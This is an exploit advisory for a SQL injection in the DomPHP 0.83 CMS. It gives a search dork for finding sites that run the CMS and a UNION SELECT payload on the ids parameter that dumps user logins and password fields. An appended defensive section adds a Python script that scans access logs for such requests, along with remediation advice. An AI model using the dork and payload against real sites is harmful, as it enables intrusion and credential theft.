DomPHP 0.83 - SQL Injection

EDB-ID: 30872

Platform: PHP

Date: 2014-01-13



-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP <= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  SQL Injection Vulnerability 
 
= DORK : Site créé à l'aide du CMS DomPHP v0.83 
 
= Exploit :                               
http://[target]/agenda/indexdate.php?ids=77 [SQL]
                 
Example :

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--
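Added example, not part of the original advisory: because the injection point is the `ids` query parameter of `agenda/indexdate.php`, a defender can review web-server access logs for requests to that script where `ids` is anything other than a plain integer. The log lines below are constructed, and both the combined log format and the premise that `ids` is meant to be a numeric ID are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic), documentation-range IPs.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jan/2014:10:00:01 +0000] "GET /domphp/agenda/indexdate.php?ids=77 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Jan/2014:10:00:07 +0000] "GET /domphp/agenda/indexdate.php?ids=77%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 6144
203.0.113.9 - - [13/Jan/2014:10:00:09 +0000] "GET /domphp/agenda/indexdate.php?ids=77+union+select+1 HTTP/1.1" 200 6100
198.51.100.2 - - [13/Jan/2014:10:01:00 +0000] "GET /domphp/agenda/indexdate.php?ids=12&ids=x' HTTP/1.1" 500 312
198.51.100.7 - - [13/Jan/2014:10:02:00 +0000] "GET /domphp/index.php?ids=abc HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
TARGET_SUFFIX = "/agenda/indexdate.php"   # script named in the advisory
PLAIN_INT_RE = re.compile(r"[0-9]{1,10}")  # assumption: ids is a numeric ID


def suspicious_ids_requests(log_text):
    """Return (client, decoded ids value) for requests to indexdate.php
    whose ids parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(TARGET_SUFFIX):
            continue
        # parse_qs percent-decodes values and maps '+' to a space; repeated
        # ids= parameters are all checked, and empty values are kept.
        for value in parse_qs(url.query, keep_blank_values=True).get("ids", []):
            if not PLAIN_INT_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_ids_requests(SAMPLE_LOG):
        print(f"{client}\tids={value!r}")
```

The same integer-only rule is the fix on the application side: reject or cast `ids` before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.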